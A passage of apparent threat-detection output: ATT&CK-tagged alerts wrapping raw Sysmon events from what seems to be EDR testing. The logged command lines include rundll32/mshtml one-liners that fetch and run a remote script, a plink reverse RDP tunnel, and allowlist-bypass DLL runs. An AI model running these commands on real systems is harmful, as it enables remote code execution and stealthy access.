<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028767.484881,2019-03-20T00:52:47.484881+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:52:47.474867Z"">
</TimeCreated>
<EventRecordID>1966464</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:52:47.364</Data>
<Data Name=""ProcessGuid"">365ABB72-569F-5C91-0000-0010D96C0800</Data>
<Data Name=""ProcessId"">3140</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1550311342.965921,2019-02-16T14:02:22.965921+04:00,,Threat,High,User Name : ( PC01\IEUser ) with Command Line : ( plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test ) contain suspicious command ( plink.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-02-16T10:02:21.934438Z"">
</TimeCreated>
<EventRecordID>1940899</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1728"" ThreadID=""412"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-02-16 10:02:21.934</Data>
<Data Name=""ProcessGuid"">365ABB72-DFAD-5C67-0000-0010E0811500</Data>
<Data Name=""ProcessId"">2312</Data>
<Data Name=""Image"">C:\Users\IEUser\Desktop\plink.exe</Data>
<Data Name=""FileVersion"">Release 0.70</Data>
<Data Name=""Description"">Command-line SSH, Telnet, and Rlogin client</Data>
<Data Name=""Product"">PuTTY suite</Data>
<Data Name=""Company"">Simon Tatham</Data>
<Data Name=""CommandLine"">plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">PC01\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-D6AB-5C67-0000-002056660200</Data>
<Data Name=""LogonId"">0x26656</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4</Data>
<Data Name=""ParentProcessGuid"">365ABB72-D92A-5C67-0000-0010CB580900</Data>
<Data Name=""ParentProcessId"">3904</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;))",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:10.708142Z"">
</TimeCreated>
<EventRecordID>4971</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:10.619</Data>
<Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-001058828C00</Data>
<Data Name=""ProcessId"">348</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
<Data Name=""ParentProcessId"">5844</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:10.708142Z"">
</TimeCreated>
<EventRecordID>4971</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:10.619</Data>
<Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-001058828C00</Data>
<Data Name=""ProcessId"">348</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
<Data Name=""ParentProcessId"">5844</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436051.041111,2019-07-30T01:34:11.041111+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:10.708142Z"">
</TimeCreated>
<EventRecordID>4971</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:10.619</Data>
<Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-001058828C00</Data>
<Data Name=""ProcessId"">348</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
<Data Name=""ParentProcessId"">5844</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436050.388196,2019-07-30T01:34:10.388196+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:10.373481Z"">
</TimeCreated>
<EventRecordID>4969</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:10.292</Data>
<Data Name=""ProcessGuid"">747F3D96-6652-5D3F-0000-0010B9708C00</Data>
<Data Name=""ProcessId"">5844</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test&quot;)</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.542307Z"">
</TimeCreated>
<EventRecordID>4968</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.526</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010BB5D8C00</Data>
<Data Name=""ProcessId"">5572</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ParentProcessId"">912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.542307Z"">
</TimeCreated>
<EventRecordID>4968</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.526</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010BB5D8C00</Data>
<Data Name=""ProcessId"">5572</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ParentProcessId"">912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436050.373481,2019-07-30T01:34:10.373481+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.542307Z"">
</TimeCreated>
<EventRecordID>4968</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.526</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-0010BB5D8C00</Data>
<Data Name=""ProcessId"">5572</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ParentProcessId"">912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 AllTheThings.dll,EntryPoint)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:05.502592Z"">
</TimeCreated>
<EventRecordID>4967</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:05.475</Data>
<Data Name=""ProcessGuid"">747F3D96-664D-5D3F-0000-00108D5B8C00</Data>
<Data Name=""ProcessId"">912</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 AllTheThings.dll,EntryPoint</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
